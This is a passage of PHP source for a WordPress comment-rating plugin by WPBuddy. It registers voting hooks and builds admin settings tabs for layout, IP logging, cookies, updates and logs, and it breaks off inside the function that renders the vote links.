<?php
namespace wpbuddy\plugins\CommentRating;

use wpbuddy\plugins\CommentRating\WPB_Plugin;
use wpbuddy\plugins\CommentRating\WPB_Plugin_Admin_Page;
use wpbuddy\plugins\CommentRating\WPB_Plugin_Settings_Tab;
use wpbuddy\plugins\CommentRating\WPB_Plugin_Metabox;

// Exit if accessed directly
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

/**
 * Class WPB_Push_Notification_Service
 * @package wpbuddy\plugins\GoogleSitesearch
 * @since   1.0
 * @version 1.5.0
 */
class WPB_Comment_Rating extends WPB_Plugin {

	/**
	 * Short description.
	 *
	 * @since  1.0.0
	 * @access private
	 *
	 * @var null $_nonce Description.
	 */
	private $_nonce = null;


	/**
	 * The parents of a comment as a comma separated list. Only set when a comment is going to be deleted. Executed when comment has been deleted.
	 *
	 * @since  1.0.0
	 * @access private
	 *
	 * @var null|string $_deleted_parents The parents of a comment as a comma separated list.
	 */
	private $_deleted_parents = null;


	/**
	 * Holds the rating value of the comment which is gonna be deleted.
	 *
	 * @since  1.0.0
	 * @access private
	 *
	 * @var int $_deleted_comment_rating
	 */
	private $_deleted_comment_rating = 0;

	/**
	 * Constructor.
	 *
	 * @since 1.0
	 *
	 * @param array $options
	 *
	 */
	public function __construct( $options = array() ) {
		parent::__construct( $options );

		// removes the get_comment filter when post author gets notified
		add_filter( 'pre_option_comments_notify', array( &$this, 'deactivate_comment_rating_during_notify' ), 10, 1 );

		// removes the get_comment_filter when moderators get notified
		add_filter( 'pre_option_moderation_notify', array( &$this, 'deactivate_comment_rating_during_notify' ), 10, 1 );

		// removes the filter after a comment has been added to the database
		// this is to make that if other plugins sending mails or do stuff after a comment has been added (like the subscribe to comments plugin)
		add_action( 'comment_post', array( &$this, 'delete_get_comment_cache' ), 10, 2 );

		add_action( 'delete_comment', array( &$this, 'prepare_delete_comment_ratings' ) );
		add_action( 'deleted_comment', array( &$this, 'delete_comment_ratings' ) );
		add_action( 'wp_set_comment_status', array( &$this, 'wp_set_comment_status' ), 10, 2 );

		add_filter( 'esc_textarea', array( $this, 'sce_fix' ) );

	}


	/**
	 * Does some administrational stuff
	 * @since 1.0
	 */
	public function do_admin() {

		/*************************************
		 * deletes the log
		 *************************************/
		add_action( __NAMESPACE__ . '\wpb_plugin_page_action_wpbcr_delete_log', array( $this, 'delete_error_log' ) );

		add_action( 'admin_head', array( $this, 'admin_head' ) );

		add_action( 'wp_ajax_wpbcr_ajax_comment', array( &$this, 'ajax_rate_comment' ) );
		add_action( 'wp_ajax_nopriv_wpbcr_ajax_comment', array( &$this, 'ajax_rate_comment' ) );

		add_action( __NAMESPACE__ . '\wpb_plugin_page_action_wpbcr_uninstall', array( $this, 'uninstall_1' ) );

		add_action( __NAMESPACE__ . '\wpb_plugin_page_action_wpbcr_uninstall_step2', array( &$this, 'uninstall' ) );

		add_filter( 'manage_edit-comments_columns', array( &$this, 'manage_posts_columns' ) );

		add_filter( 'manage_comments_custom_column', array( &$this, 'manage_comments_custom_column' ), 10, 2 );

		add_action( __NAMESPACE__ . '\wpb_plugin_page_action_wpbcr_truncate_ip_table', array(
			$this,
			'truncate_ip_table'
		) );
	}


	/**
	 * do the init for this plugin
	 * @since 1.0
	 */
	public function do_non_admin() {

		/**
		 * @todo This filter gets removed in the comment_post() function. Important: To remove a hook, the $function_to_remove and $priority arguments must match when the hook was added. This goes for both filters and actions. No warning will be given on removal failure.
		 */
		add_filter( 'get_comment', array( $this, 'cr_get_comment' ), 100 );

		add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_scripts_frontend' ), 50 );

		add_action( 'wp_head', array( $this, 'custom_css' ), 50 );

		add_filter( 'comments_array', array( $this, 'sort_comments' ), 10, 2 );

		add_shortcode( 'wpbcr_comment_ranking', array( $this, 'shortcode_comment_ranking' ) );

		if ( ! has_filter( 'widget_text', 'do_shortcode' ) ) {
			add_filter( 'widget_text', 'do_shortcode' );
		}

		add_filter( 'wpbcr_output_html', array( $this, 'already_rated_text' ), 10, 2 );

	}


	/**
	 * Creates the admin pages
	 * @return array
	 * @since 1.0
	 */
	public function init_admin_pages() {
		$settings_pages = array();

		// create a new page with the title "Push Notices"
		$settings_pages['comment_rating'] = new WPB_Plugin_Admin_Subpage( __( 'Rating', $this->text_domain ), 'edit-comments.php', 'wpcommentrating' );

		$settings_pages['comment_rating']->add_script( 'wp-color-picker' );
		$settings_pages['comment_rating']->add_script( 'wpb-cr-backend' );

		$settings_pages['comment_rating']->add_style( 'wp-color-picker' );
		$settings_pages['comment_rating']->add_style( 'wpb-cr-frontend' );
		$settings_pages['comment_rating']->add_style( 'wpb-cr-frontend-awesome' );
		$settings_pages['comment_rating']->add_style( 'wpb-cr-backend' );

		$settings_pages['comment_rating']->set_page_icon_url( $this->plugins_url( 'assets/img/comment-rating-icon.svg' ) );

		// create a new menu for this page with the same title
		$settings_pages['comment_rating']->create_menu_entry( 'manage_options', $this->plugins_url( 'assets/img/comment-rating-icon.svg' ) );

		// declare where the settings come from on this particular page
		$settings_pages['comment_rating']->set_settings_filter_func( array( &$this, 'main_page_settings' ) );

		$settings_pages['comment_rating']->display_submit_button = false;


		return $settings_pages;
	}


	/**
	 * A filter which hooks into the main page settings
	 *
	 * @param array                 $settings
	 * @param WPB_Plugin_Admin_Page $page
	 *
	 * @return array
	 * @since 1.0
	 */
	public function main_page_settings( $settings, $page ) {

		// Set up a new section
		$settings['layout'] = new WPB_Plugin_Settings_Tab( 'layout', __( 'Layout', $this->get_textdomain() ) );

		// set up a new subsection (which is a WPB_Plugin_Settings_Section class)
		$section_layout_vote_up = $settings['layout']->add_subsection( 'vote-up', __( 'Vote up', $this->get_textdomain() ), 'in_metabox', null, 'normal' );

		$section_layout_vote_up->add_settings( array(
			'is_vote_up'            => array(
				'label'         => __( 'Activate up-voting', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 1,
				'related_items' => array( 1, 2, 3, 4, 5 ),
			),
			'vote_down_icons'       => array(
				'label'        => __( 'Icons', $this->get_textdomain() ),
				'type'         => 'info',
				'classes'      => array( 'wpbcr-list-icons' ),
				'help_message' => implode( ' ', array_map( function ( $v ) {
					return '<span data-icon_name="' . $v . '" class="wpbcr-icon wpbcr-icon-' . $v . '"></span>';
				}, $this->get_up_icons() ) )
			),
			'vote_up_icon'          => array(
				'label'         => __( 'Icon', $this->get_textdomain() ),
				'type'          => 'text',
				'classes'       => array( 'wpbcr-list-icon' ),
				'default_value' => 'arrow-circle-up',
				'description'   => sprintf( __( 'You can use every single Font Awesome icon (but without the "fa-" prefix). View %s.', $this->get_textdomain() ), '<a target="_blank" href="http://fontawesome.io/icons/">Font Awesome Icons</a>' )
			),
			'vote_up_html_icon'     => array(
				'label'         => __( 'ASCII/HTML Text', $this->get_textdomain() ),
				'type'          => 'text',
				'default_value' => '',
				'placeholder'   => '&#10138;',
				'classes'       => array( 'small-text' ),
				'description'   => sprintf( __( 'If you want to use an ASCII- or HTML-Icon instead, please enter it here. If you have entered an ASCII- or HTML-Icon on the Vote-down section OR if the vote-down section is disabled, the Font Awesome will not be loaded. See %s for more HTML-codes.', $this->get_textdomain() ), '<a href="http://character-code.com" target="_blank">character-code.com</a>' )
			),
			'vote_up_font_size'     => array(
				'label'         => __( 'Icon size', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 14,
				'classes'       => array( 'small-text' ),
				'after'         => 'px',
				'attributes'    => array(
					'min'   => 1,
					'max'   => 200,
					'steps' => 1
				),
			),
			'vote_up_position'      => array(
				'label'         => __( 'Order', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 1,
				'classes'       => array( 'small-text' ),
				'description'   => __( 'The position', $this->get_textdomain() ),
				'attributes'    => array(
					'min'   => 1,
					'max'   => 3,
					'steps' => 1
				),
			),
			'vote_up_color'         => array(
				'label'         => __( 'Color', $this->get_textdomain() ),
				'type'          => 'text',
				'default_value' => '',
				'classes'       => array( 'wpb-color-picker' )
			),
			'updates_submit_button' => array(
				'type'               => 'submit_button',
				'submit_button_args' => array(
					'type' => 'secondary',
					'wrap' => false,
				)
			),
		) );

		// set up a new subsection (which is a WPB_Plugin_Settings_Section class)
		$section_layout_vote_down = $settings['layout']->add_subsection( 'vote-down', __( 'Vote down', $this->get_textdomain() ), 'in_metabox', null, 'normal' );

		$section_layout_vote_down->add_settings( array(
			'is_vote_down'          => array(
				'label'         => __( 'Activate down-voting', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 1,
				'related_items' => array( 1, 2, 3, 4, 5 ),
			),
			'vote_down_icons'       => array(
				'label'        => __( 'Icons', $this->get_textdomain() ),
				'type'         => 'info',
				'classes'      => array( 'wpbcr-list-icons' ),
				'help_message' => implode( ' ', array_map( function ( $v ) {
					return '<span data-icon_name="' . $v . '" class="wpbcr-icon wpbcr-icon-' . $v . '"></span>';
				}, $this->get_down_icons() ) )
			),
			'vote_down_icon'        => array(
				'label'         => __( 'Icon', $this->get_textdomain() ),
				'type'          => 'text',
				'classes'       => array( 'wpbcr-list-icon' ),
				'default_value' => 'arrow-circle-down',
				'description'   => sprintf( __( 'You can use every single Font Awesome icon (but without the "fa-" prefix). View %s.', $this->get_textdomain() ), '<a target="_blank" href="http://fontawesome.io/icons/">Font Awesome Icons</a>' )
			),
			'vote_down_html_icon'   => array(
				'label'         => __( 'ASCII/HTML Text', $this->get_textdomain() ),
				'type'          => 'text',
				'default_value' => '',
				'placeholder'   => '&#10136;',
				'classes'       => array( 'small-text' ),
				'description'   => sprintf( __( 'If you want to use an ASCII- or HTML-Icon instead, please enter it here. If you have entered an ASCII- or HTML-Icon on the vote-up section OR if the vote-up section is disabled, the Font Awesome will not be loaded. See %s for more HTML-codes.', $this->get_textdomain() ), '<a href="http://character-code.com" target="_blank">character-code.com</a>' )
			),
			'vote_down_font_size'   => array(
				'label'         => __( 'Icon size', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 14,
				'classes'       => array( 'small-text' ),
				'after'         => 'px',
				'attributes'    => array(
					'min'   => 1,
					'max'   => 200,
					'steps' => 1
				),
			),
			'vote_down_position'    => array(
				'label'         => __( 'Order', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 3,
				'classes'       => array( 'small-text' ),
				'description'   => __( 'The position', $this->get_textdomain() ),
				'attributes'    => array(
					'min'   => 1,
					'max'   => 3,
					'steps' => 1
				),
			),
			'vote_down_color'       => array(
				'label'         => __( 'Color', $this->get_textdomain() ),
				'type'          => 'text',
				'default_value' => '',
				'classes'       => array( 'wpb-color-picker' )
			),
			'updates_submit_button' => array(
				'type'               => 'submit_button',
				'submit_button_args' => array(
					'type' => 'secondary',
					'wrap' => false,
				)
			),
		) );

		$section_layout_vote_rating = $settings['layout']->add_subsection( 'total-rating', __( 'Rating', $this->get_textdomain() ), 'in_metabox', null, 'normal' );

		$section_layout_vote_rating->add_settings( array(
			'is_total_rating'        => array(
				'label'         => __( 'Display total rating', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 1,
				'related_items' => array( 1, 2, 3, 4 ),
			),
			'total_rating_string'    => array(
				'label'         => __( 'String', $this->get_textdomain() ),
				'type'          => 'text',
				'default_value' => '(%d)',
				'description'   => __( '%d is the placeholder for the total number of rating a comment has got.', $this->get_textdomain() ),
			),
			'total_rating_font_size' => array(
				'label'         => __( 'Font size', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 14,
				'classes'       => array( 'small-text' ),
				'after'         => 'px',
				'attributes'    => array(
					'min'   => 1,
					'max'   => 200,
					'steps' => 1
				),
			),
			'total_rating_position'  => array(
				'label'         => __( 'Order', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 2,
				'classes'       => array( 'small-text' ),
				'description'   => __( 'The position', $this->get_textdomain() ),
				'attributes'    => array(
					'min'   => 1,
					'max'   => 3,
					'steps' => 1
				),
			),
			'total_rating_color'     => array(
				'label'         => __( 'Color', $this->get_textdomain() ),
				'type'          => 'text',
				'default_value' => '',
				'classes'       => array( 'wpb-color-picker' )
			),
			'updates_submit_button'  => array(
				'type'               => 'submit_button',
				'submit_button_args' => array(
					'type' => 'secondary',
					'wrap' => false,
				)
			),
		) );

		$section_layout_css = $settings['layout']->add_subsection( 'css', __( 'Custom CSS', $this->get_textdomain() ), 'in_metabox', null, 'normal' );

		$section_layout_css->add_settings( array(
			'custom_css'            => array(
				'label'           => __( 'Custom CSS', $this->get_textdomain() ),
				'type'            => 'textarea',
				'is_codemirror'   => true,
				'codemirror_mode' => 'less',
			),
			'updates_submit_button' => array(
				'type'               => 'submit_button',
				'submit_button_args' => array(
					'type' => 'secondary',
					'wrap' => false,
				)
			),
		) );

		$section_layout_wpbuddy_about = $settings['layout']->add_subsection( 'wpbuddy_about', __( 'About', $this->get_textdomain() ), 'in_metabox', null, 'side' );

		$section_layout_wpbuddy_about->add_settings( array(
			'wpbuddy_about' => array(
				'label'        => '',
				'type'         => 'info',
				'help_message' => '<a href="http://bit.ly/TO0Z5w" target="_blank"><img src="https://wpbuddy.libra.uberspace.de/secure/wp-buddy-logo.png" alt="WPBuddy Logo" /></a>',
				'print_label'  => false
			),
		) );


		ob_start();

		$like_link = 'http://wp-buddy.com/products/plugins/wordpress-comment-rating-plugin/';
		?>
		<p>
		<div class="g-plusone" data-size="medium" data-href="<?php echo $like_link; ?>"></div>
		</p>

		<script type="text/javascript">
			(function () {
				var po = document.createElement( 'script' );
				po.type = 'text/javascript';
				po.async = true;
				po.src = 'https://apis.google.com/js/plusone.js';
				var s = document.getElementsByTagName( 'script' )[0];
				s.parentNode.insertBefore( po, s );
			})();
		</script>

		<p>
			<a href="https://twitter.com/share" class="twitter-share-button" data-url="<?php echo $like_link; ?>" data-text="Check out the <?php echo $this->name; ?>" data-related="wp_buddy">Tweet</a>
		</p>
		<script>!function ( d, s, id ) {
				var js, fjs = d.getElementsByTagName( s )[0];
				if ( !d.getElementById( id ) ) {
					js = d.createElement( s );
					js.id = id;
					js.src = "//platform.twitter.com/widgets.js";
					fjs.parentNode.insertBefore( js, fjs );
				}
			}( document, "script", "twitter-wjs" );</script>

		<p>
			<iframe src="//www.facebook.com/plugins/like.php?href=<?php echo urlencode( $like_link ); ?>&amp;send=false&amp;layout=button_count&amp;width=150&amp;show_faces=false&amp;font&amp;colorscheme=light&amp;action=like&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;" allowTransparency="true"></iframe>
		</p>
		<?php

		$social_buttons = ob_get_clean();

		$section_layout_wpbuddy_social = $settings['layout']->add_subsection( 'wpbuddy_social', __( 'Like this plugin?', $this->get_textdomain() ), 'in_metabox', null, 'side' );

		$section_layout_wpbuddy_social->add_settings( array(
				'wpbuddy_social' => array(
					'label'        => '',
					'type'         => 'info',
					'help_message' => $social_buttons,
					'print_label'  => false
				),
			)
		);


		$section_layout_wpbuddy_links = $settings['layout']->add_subsection( 'wpbuddy_links', __( 'Help & Links', $this->get_textdomain() ), 'in_metabox', null, 'side' );

		$section_layout_wpbuddy_links->add_settings( array(
			'wpbuddy_links' => array(
				'label'        => '',
				'type'         => 'info',
				'help_message' => '<ul>'
				                  . '<li><a href="http://wp-buddy.com/documentation/plugins/wordpress-comment-rating-plugin/faq/" target="_blank">' . __( 'Frequently Asked Questions', $this->get_textdomain() ) . '</a></li>'
				                  . '<li><a href="http://wp-buddy.com/documentation/plugins/wordpress-comment-rating-plugin/" target="_blank">' . __( 'Version History', $this->get_textdomain() ) . '</a></li>'
				                  . '<li><a href="http://wp-buddy.com/support/" target="_blank">' . __( 'Report a bug', $this->get_textdomain() ) . '</a></li>'
				                  . '<li><a href="http://wp-buddy.com/documentation/plugins/wordpress-comment-rating-plugin/request-function/" target="_blank">' . __( 'Request a function', $this->get_textdomain() ) . '</a></li>'
				                  . '<li><a href="http://wp-buddy.com/documentation/plugins/wordpress-comment-rating-plugin/submit-translation/" target="_blank">' . __( 'Submit a translation', $this->get_textdomain() ) . '</a></li>'
				                  . '<li><a href="http://wp-buddy.com" target="_blank">' . __( 'More cool stuff by WPBuddy', $this->get_textdomain() ) . '</a></li>'
				                  . '</ul>',
				'print_label'  => false
			),
		) );


		global $current_user;
		get_currentuserinfo();
		$name = $current_user->user_firstname;
		if ( empty( $name ) ) {
			$name = $current_user->display_name;
		}

		ob_start();
		?>
		<div class="wpbuddy-cr-form">
			<label for="text1210658"><?php echo __( 'Your first name', $this->get_textdomain() ); ?></label><br />
			<input id="text1210658" name="209681" type="text" value="<?php echo $name; ?>" /><br /><br />
			<label for="text1210692"><?php echo __( 'Your E-Mail address', $this->get_textdomain() ); ?></label><br />
			<input id="text1210692" name="email" value="<?php echo $current_user->user_email; ?>" type="text" /><br /><br />
			<a href="https://10955.cleverreach.com/f/54067/wcs/" target="_blank" class="button button-primary"><?php echo __( 'Subscribe for free', $this->get_textdomain() ); ?></a>
		</div>
		<script type="text/javascript">
			/* <![CDATA[ */
			jQuery( document ).ready( function ( $ ) {

				jQuery( '.wpbuddy-cr-form a.button' ).click( function ( e ) {
					e.preventDefault();

					var name = jQuery( '#text1210658' ).val();
					var mail = jQuery( '#text1210692' ).val();

					jQuery( [
						'<form style="display:none;" action="https://10955.cleverreach.com/f/54067/wcs/" method="post" target="_blank">',
						'<input id="text1210692" name="email" value="' + mail + '" type="text"  />',
						'<input id="text1210658" name="209681" type="text" value="' + name + '"  />',
						'</form>'
					].join( '' ) ).appendTo( 'body' )[0].submit();

				} );
			} );
			/* ]]> */
		</script>
		<?php
		$subscribe_form = ob_get_clean();

		$section_layout_wpbuddy_subscribe = $settings['layout']->add_subsection( 'wpbuddy_subscribe', __( 'Subscribe to our free newsletter', $this->get_textdomain() ), 'in_metabox', null, 'side' );

		$section_layout_wpbuddy_subscribe->add_settings( array(
				'wpbuddy_subscribe' => array(
					'label'        => '',
					'type'         => 'info',
					'help_message' => $subscribe_form,
					'print_label'  => false
				),
			)
		);

		/***********************
		 *
		 * SETTINGS
		 *
		 ***********************/
		$settings['settings'] = new WPB_Plugin_Settings_Tab( 'settings', __( 'Settings', $this->get_textdomain() ) );

		// set up a new subsection (which is a WPB_Plugin_Settings_Section class)
		$section_settings_settings = $settings['settings']->add_subsection( 'settings', __( 'Settings', $this->get_textdomain() ), 'in_metabox', null, 'normal' );


		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		$ip_table_entries = $wpdb->get_var( 'SELECT COUNT(*) FROM ' . $wpdb->prefix . 'cr_ips' );

		$section_settings_settings->add_settings( array(
			'use_nonces'            => array(
				'label'         => __( 'Use nonces', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 1,
				'description'   => sprintf( __( 'The plugin uses so called %1$s"nonces"%2$s for security reasons. On this WordPress installation nonces will have a lifetime of %3$s seconds. If a caching plugin is used please make sure that your cache will invalidate earlier. Otherwise the rating will not work. If it is not possible to configure the cache you can deactivate this functionality at your own risk.', TEXTDOMAIN ), '<a target="_blank" href="http://codex.wordpress.org/WordPress_Nonces">', '</a>', ceil( time() * 2 / wp_nonce_tick() ) )
			),
			'is_resorting'          => array(
				'label'         => __( 'Resort comments', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 1,
				'description'   => __( 'Whether to resort comments according to their ratings. Note that nested comments are summed up to their parents.', TEXTDOMAIN )
			),
			'only_logged_in'        => array(
				'label'         => __( 'Logged-in users only', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 0,
				'description'   => __( 'Allow rating for logged in users only.', TEXTDOMAIN )
			),
			'set_cookies'           => array(
				'label'         => __( 'Set cookies', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 0,
				'description'   => __( 'Set cookies in the users browser to identify him. This makes sure that s/he cannot double-vote to comments. Please note that some users have disabled cookies.', TEXTDOMAIN ),
				'related_items' => array( 4 )
			),
			'cookie_time'           => array(
				'label'         => __( 'Cookie save time', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 48,
				'after'         => ' ' . __( 'hours', TEXTDOMAIN ),
				'classes'       => array( 'small-text' ),
				'description'   => __( 'How long should the cookie be valid? (in hours)', TEXTDOMAIN ),
				'attributes'    => array(
					'min'   => 1,
					'steps' => 1
				),
			),
			'log_ips'               => array(
				'label'         => __( 'Log IPs', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 1,
				'description'   => __( 'If you want to log the users IP addresses. This makes sure that s/he cannot double-vote to comments. Please note that not every user has a fixed IP address. This means that users can handle this by requesting a new IP address.', TEXTDOMAIN ),
				'related_items' => array( 6, 7, 8 )
			),
			'hash_ips'              => array(
				'label'         => __( 'Encrypt IPs', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 1,
				'description'   => __( 'In some countries of the European Union it is not allowed to log and save IP addresses of users. In this case all IP addresses will be encrypted.', TEXTDOMAIN ),
			),
			'ip_time'               => array(
				'label'         => __( 'IP save time', $this->get_textdomain() ),
				'type'          => 'number',
				'default_value' => 24,
				'after'         => ' ' . __( 'hours', TEXTDOMAIN ),
				'classes'       => array( 'small-text' ),
				'description'   => __( 'How long should IP addresses be valid? (in hours)', TEXTDOMAIN ),
				'attributes'    => array(
					'min'   => 1,
					'steps' => 1
				),
			),
			'flush_ips'             => array(
				'label'        => __( 'Flush IPs', $this->get_textdomain() ),
				'type'         => 'info',
				'help_message' => sprintf( _n( 'At current there are one entry in the IP-Database. Want to flush the table now?', 'At current there are %u entries in the IP-Database. Want to flush the table now?', $ip_table_entries, TEXTDOMAIN ), $ip_table_entries )
				                  . '<br /><br /><a class="button" href="' . esc_url( add_query_arg( array( 'wpb_plugin_page_action' => 'wpbcr_truncate_ip_table' ) ) ) . '"><span class="wpbcr-icon wpbcr-icon-trash-o"></span> ' . __( 'Yes, truncate IP table', TEXTDOMAIN ) . '</a>',
			),
			'post_types'            => array(
				'label'           => __( 'Post Types', $this->get_textdomain() ),
				'type'            => 'select',
				'select_options'  => array_flip( wp_list_pluck( get_post_types( array(
					'public'  => true,
					'show_ui' => true
				), 'objects' ), 'label' ) ),
				'select_multiple' => true,
				'description'     => __( 'Select on which post types you want to show the comment rating. Leave the field empty if you want to show it on all public post types.', TEXTDOMAIN ),
			),
			'show_already_rated'    => array(
				'label'         => __( 'Show "Already rated" text', $this->get_textdomain() ),
				'type'          => 'onoff',
				'default_value' => 0,
				'description'   => __( 'If you want to show a "You already rated this comment" text, activate this. Note that this could slow down your page load (especially if you have a lot of comments on one page). This is because the plugin needs to check if a users has rated a comment for every single comment. This also won\'nt work for sites that are using a caching plugin like WP Super Cache.', TEXTDOMAIN ),
				'related_items' => array( 11 ),
			),
			'already_rated_text'    => array(
				'label'         => __( '"Already rated" text', $this->get_textdomain() ),
				'type'          => 'text',
				'default_value' => __( 'Already rated!', $this->get_textdomain() )
			),
			'updates_submit_button' => array(
				'type'               => 'submit_button',
				'submit_button_args' => array(
					'type' => 'secondary',
					'wrap' => false,
				)
			),
		) );

		// set up a new subsection (which is a WPB_Plugin_Settings_Section class)
		$section_settings_updates = $settings['settings']->add_subsection( 'updates', __( 'Updates', $this->get_textdomain() ), 'in_metabox', null, 'normal' );

		$section_settings_updates->add_settings( array(
			'purchase_code'         => array(
				'label'       => __( 'Purchase Code', $this->get_textdomain() ),
				'type'        => 'text',
				'description' => __( 'Please enter your purchase code here if you want to get updates automatically.', TEXTDOMAIN ) . ' <a href="http://wp-buddy.com/wiki/where-to-find-your-purchase-code/" taret="_blank">' . __( 'Click here if you do not know where to find your purchase code.', TEXTDOMAIN ) . '</a>'
			),
			'updates_submit_button' => array(
				'type'               => 'submit_button',
				'submit_button_args' => array(
					'type' => 'secondary',
					'wrap' => false,
				)
			),
		) );

		$section_settings_updates = $settings['settings']->add_subsection( 'uninstall', __( 'Uninstalling', $this->get_textdomain() ), 'in_metabox', null, 'normal' );

		$section_settings_updates->add_settings( array(

			'uninstall_button' => array(
				'type'         => 'info',
				'classes'      => array( 'wpbcr-uninstall' ),
				'help_message' => '<a href="' . esc_url( add_query_arg( array( 'wpb_plugin_page_action' => 'wpbcr_uninstall' ) ) ) . '" class="button wpbcr-button-deletion"><span class="wpbcr-icon wpbcr-icon-trash-o"></span> ' . __( 'Uninstall the plugin', TEXTDOMAIN ) . '</a>',
			),
		) );


		/***********************
		 *
		 * LOG
		 *
		 ***********************/
		$settings['log'] = new WPB_Plugin_Settings_Tab( 'log', __( 'Log', $this->get_textdomain() ) );

		// set up a new subsection (which is a WPB_Plugin_Settings_Section class)
		$section_layout_info_settings = $settings['log']->add_subsection( 'info-settings', __( 'Info settings', $this->get_textdomain() ) );

		$section_layout_info_settings->add_settings( array(
				'log_max_no' => array(
					'label'         => __( 'Max. number of log items', $this->get_textdomain() ),
					'type'          => 'text',
					'classes'       => array( 'small-text' ),
					'description'   => __( 'When set to "0" the plugin will never save anything into the log.', $this->get_textdomain() ),
					'default_value' => 50
				)
			)
		);

		// set up a new subsection (which is a WPB_Plugin_Settings_Section class)
		$section_layout_log = $settings['log']->add_subsection( 'log', __( 'Log', $this->get_textdomain() ) );

		$section_layout_log->add_setting( 'log_info_delete_top', array(
			'label'               => '',
			'type'                => 'button',
			'external_link_label' => __( 'Delete log', $this->get_textdomain() ),
			'external_link'       => esc_url( add_query_arg( array( 'wpb_plugin_page_action' => 'wpbcr_delete_log' ) ) ),
		) );

		if ( 'log' == $page->current_tab ) {
			$i    = 0;
			$logs = $this->get_log();
			krsort( $logs, SORT_NUMERIC );

			foreach ( $logs as $log ) {
				$i ++;
				$section_layout_log->add_setting( 'log_info_' . $i, array(
					'label'        => date_i18n( get_option( 'date_format' ) . ' ' . get_option( 'time_format' ), $log['timestamp'] ),
					'type'         => 'info',
					'help_message' => $log['message']
				) );
			}
		}

		$section_layout_log->add_setting( 'log_info_delete_bottom', array(
			'label'               => '',
			'type'                => 'button',
			'external_link_label' => __( 'Delete log', $this->get_textdomain() ),
			'external_link'       => esc_url( add_query_arg( array( 'wpb_plugin_page_action' => 'wpbcr_delete_log' ) ) ),
		) );

		// shows the "system" tab
		$page->display_system_status = true;

		return $settings;
	}


	/**
	 * Logs a message into the database
	 *
	 * @param string $message
	 *
	 * @param int    $time
	 *
	 * @return bool
	 *
	 * @since 1.0
	 */
	public static function log( $message, $time = null ) {
		$log = self::get_setting( 'log' );
		if ( ! is_array( $log ) ) {
			$log = array();
		}

		if ( is_null( $time ) ) {
			$time = current_time( 'timestamp' );
		}

		$log[] = array(
			'timestamp' => $time,
			'message'   => $message
		);

		$max_no = self::get_setting( 'log_max_no', 50 );

		$log = array_slice( $log, ( - 1 * abs( $max_no ) ), abs( $max_no ) );

		return self::set_setting( 'log', $log );
	}


	/**
	 * Returns the log array as follows
	 * array(
	 *  time    => $timestamp
	 *  message => $message
	 * )
	 *
	 * @since 1.0
	 *
	 * @return array
	 */
	public function get_log() {
		$log = $this->get_setting( 'log', array() );
		if ( ! is_array( $log ) ) {
			$log = array();
		}

		return $log;
	}


	/**
	 * Manipulates the comment text and adds the HTML sourcecode for rating comments
	 * @since    1.0
	 *
	 * @param object    $comment
	 *
	 * @global \WP_Post $post
	 *
	 * @return string
	 */
	public function cr_get_comment( $comment ) {

		if ( is_feed() ) {
			return $comment;
		}

		// stop here if the comment_id is not available
		if ( ! is_object( $comment ) ) {
			return $comment;
		}

		// do not allow rating for other comment types then standard comments
		if ( ! empty( $comment->comment_type ) ) {
			return $comment;
		}

		if ( isset( $comment->wpb_cr_karma_added ) && $comment->wpb_cr_karma_added ) {
			return $comment;
		}

		global $post;

		if ( ! is_a( $post, 'WP_Post' ) ) {
			return $comment;
		}

		$allowed_post_types = array_filter( (array) $this->get_setting( 'post_types' ) );

		if ( count( $allowed_post_types ) > 0 ) {
			$post_type = get_post_type( $post );
			if ( is_string( $post_type ) && ! in_array( $post_type, $allowed_post_types ) ) {
				return $comment;
			}
		}

		$elements = array();

		// Down voting
		if ( (bool) $this->get_setting( 'is_vote_down', 1 ) ) {
			$icon      = $this->get_setting( 'vote_down_icon', 'arrow-circle-down' );
			$html_icon = $this->get_setting( 'vote_down_html_icon' );

			$text = '';

			if ( ! empty( $html_icon ) ) {
				$text  = $html_icon;
				$class = '';
			} elseif ( empty( $icon ) ) {
				$class = 'arrow-circle-down';
			} else {
				$class = $icon;
			}

			$order              = $this->find_element_order( $elements, (int) $this->get_setting( 'vote_down_position', 3 ) );
			$elements[ $order ] = '<a title="' . __( 'Vote down', $this->get_textdomain() ) . '" class="wpbcr-rate-down wpbcr-icon wpbcr-icon-' . $class . '" rel="nofollow" href="#" data-wpbcr_whereto="down" data-wpbcr_id="' . $comment->comment_ID . '">' . $text . '</a>';
		}

		// Up voting
		if ( (bool) $this->get_setting( 'is_vote_up', 1 ) ) {
			$icon      = $this->get_setting( 'vote_up_icon', 'arrow-circle-up' );
			$html_icon = $this->get_setting( 'vote_up_html_icon' );

			$text = '';

			if ( ! empty( $html_icon ) ) {
				$text  = $html_icon;
				$class = '';
			} elseif ( empty( $icon ) ) {
				$class = 'arrow-circle-up';
			} else {
				$class = $icon;
			}

			$order              = $this->find_element_order( $elements, (int) $this->get_setting( 'vote_up_position', 1 ) );
			$elements[ $order ] = '<a title="' . __( 'Vote up', $this->get_textdomain() ) . '" class="wpbcr-rate-up wpbcr-icon wpbcr-icon-' . $class . '" rel="nofollow" href="#" data-wpbcr_whereto="up" data-wpbcr_id="' . $comment->comment_ID . '" >' . $text . '</a>';
		}

		// the total rating
		if ( (bool) $this->get_setting( 'is_total_rating', 1 ) ) {

			$rating = isset( $comment->comment_wpbcr_rating ) ? intval( $comment->comment_wpbcr_rating ) : intval( get_comment_meta( $comment->comment_ID, 'wpbcr_rating', true ) );

			$str = $this->get_setting( 'total_rating_string', '(%d)' );
